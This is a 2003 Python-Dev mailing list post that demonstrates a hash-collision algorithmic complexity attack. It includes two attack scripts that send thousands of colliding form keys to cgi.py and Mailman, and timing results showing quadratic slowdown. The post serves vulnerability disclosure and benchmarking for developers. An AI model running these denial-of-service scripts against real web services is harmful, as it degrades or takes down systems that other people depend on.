[Python-Dev] Algoritmic Complexity Attack on Python

Jeff Epler jepler@unpythonic.net
Sat, 31 May 2003 12:42:17 -0500


On Sat, May 31, 2003 at 10:48:28AM -0500, Scott A Crosby wrote:
> On Sat, 31 May 2003 09:17:16 -0400, "Phillip J. Eby" <pje@telecommunity.com> writes:
> 
> > At 05:02 PM 5/30/03 -0500, Scott A Crosby wrote:
> 
> > But based on the discussion so far, I'm not sure I see how this attack
> > would produce an effect that was dramatically disproportionate to the
> > amount of data transmitted.
> 
> I apologize for not having this available earlier, but a corrected
> file of 10,000 inputs is now available and shows the behavior I
> claimed. (Someone else independently reimplemented the attack and has
> sent me a corrected set for python.) With 10,000 inputs, python
> requires 19 seconds to process instead of .2 seconds. A file of half
> the size requires 4 seconds, showing the quadratic behavior, as with
> the case of perl. (Benchmarked on a P2-450) I thus predict that twice
> the inputs would take about 80 seconds.
> 
> I can only guess what python applications might experience an
> interesting impact from this, so I'll be silent. However, here are the
> concrete benchmarks.

the CGI module was mentioned earlier as a possible "problem area" for this
attack, I wrote a script that demonstrates this, using Scott's list of
hash-colliding strings.  I do see quadratic growth in runtime.  When runnng
the attack on mailman, however, I don't see such a large runtime, and the
growth in runtime appears to be linear.  This may be because the mailman
installation is running on 2.1 (?) and requires a different set of attack
strings.

I used the cgi.py "self-test" script (the one you get when you run cgi.py
*as* a cgi script) on the CGIHTTPServer.py server, and sent a long URL
of the form
	test.cgi?x=1&<colliding key 1>=1&<colliding key 2>=1&...
I looked at the size of the URL, the size of the response, and the time to
transfer the response.

My system is a mobile Pentium III running at 800MHz, RedHat 9, Python
2.2.2.

The mailman testing system is a K6-2 running at 350MHz, RedHat 7.1, Python
2.1.

In the results below, the very fast times and low reply sizes are due
to the fact that the execve() call fails for argv+envp>128kb.  This
limitation might not exist if the CGI was POSTed, or running as fcgi,
mod_python, or another system which does not pass the GET form contents
in the environnment.

Here are the results, for various query sizes:
########################################################################
# Output 1: Running attack in listing 1 on cgi.py
# Parameters in query: 0
Length of URL: 40
Length of contents: 2905
Time for request: 0.537268042564

# Parameters in query: 1
Length of URL: 64
Length of contents: 3001
Time for request: 0.14549601078

# Parameters in query: 10
Length of URL: 307
Length of contents: 5537
Time for request: 0.151428103447

# Parameters in query: 100
Length of URL: 2737
Length of contents: 31817
Time for request: 0.222425937653

# Parameters in query: 1000
Length of URL: 27037
Length of contents: 294617
Time for request: 4.47611808777

# Parameters in query: 2000
Length of URL: 54037
Length of contents: 586617
Time for request: 18.8749380112

# Parameters in query: 4800
Length of URL: 129637
Length of contents: 1404217
Time for request: 106.951847911

# Parameters in query: 5000
Length of URL: 135037
Length of contents: 115
Time for request: 0.516644954681

# Parameters in query: 10000
Length of URL: 270037 Length of contents: 115 Time for request: 1.01809692383

When I attempted to run the attack against Apache 1.3/Mailman, any
moderately-long GET requests provoked an Apache error message.

########################################################################
# Listing 1: test_cgi.py
import urllib, time

def time_url(url):
	t = time.time()
	u = urllib.urlopen(url)
	contents = u.read()
	t1 = time.time()
	print "Length of URL:", len(url)
	print "Length of contents:", len(contents)
	print contents[:200]
	print "Time for request:", t1-t
	print

#URL="http://www.example.com/mailman/subscribe/test"
URL="http://localhost:8000/cgi-bin/test.cgi"

items = [line.strip() for line in open("python-attack").readlines()]
for i in (0, 1, 10, 100, 1000, 2000, 4800, 5000, 10000):
	print "# Parameters in query:", i
	url = URL+"?x"
	url = url + "=1&".join(items[:i])
	time_url(url)
########################################################################

I re-wrote the script to use POST instead of GET, and again ran it on
cgi.py and mailman.  For some reason, using 0 or 1 items aginst
CGIHTTPServer.py seemed to hang.

########################################################################
# Output 2: Running attack in listing2 on cgi.py
# Parameters in query: 10
Length of URL: 38
Length of data: 272
Length of contents: 3543
Time for request: 0.314235925674

# Parameters in query: 100
Length of URL: 38
Length of data: 2702
Length of contents: 13894
Time for request: 0.218624949455

# Parameters in query: 1000
Length of URL: 38
Length of data: 27002
Length of contents: 117395
Time for request: 2.20617306232

# Parameters in query: 2000
Length of URL: 38
Length of data: 54002
Length of contents: 232395
Time for request: 9.92248606682

# Parameters in query: 5000
Length of URL: 38
Length of data: 135002
Length of contents: 577396
Time for request: 57.3930220604

# Parameters in query: 10000
Length of URL: 38
Length of data: 270002
Length of contents: 1152396
Time for request: 238.318212986

########################################################################
# Output 3: Running attack in listing2 on mailman
# Parameters in query: 10
Length of URL: 44
Length of data: 272
Length of contents: 852
Time for request: 0.938691973686

# Parameters in query: 100
Length of URL: 44
Length of data: 2702
Length of contents: 852
Time for request: 0.819067001343

# Parameters in query: 1000
Length of URL: 44
Length of data: 27002
Length of contents: 852
Time for request: 1.13541901112

# Parameters in query: 2000
Length of URL: 44
Length of data: 54002
Length of contents: 852
Time for request: 1.59714698792

# Parameters in query: 5000
Length of URL: 44
Length of data: 135002
Length of contents: 852
Time for request: 3.12452697754

# Parameters in query: 10000
Length of URL: 44
Length of data: 270002
Length of contents: 852
Time for request: 5.72900700569

########################################################################
# Listing 2: attack program using POST for longer URLs

import urllib2, time

def time_url(url, data):
	t = time.time()
	u = urllib2.urlopen(url, data)
	contents = u.read()
	t1 = time.time()
	print "Length of URL:", len(url)
	print "Length of data:", len(data)
	print "Length of contents:", len(contents)
	print "Time for request:", t1-t
	print

#URL="http://www.example.com/mailman/subscribe/test"
URL="http://localhost:8000/cgi-bin/test.cgi"

items = [line.strip() for line in open("python-attack").readlines()]
for i in (10, 100, 1000, 2000, 5000, 10000):
	print "# Parameters in query:", i
	data = "x" + "=1&".join(items[:i]) + "\r\n\r\n"
	time_url(URL, data)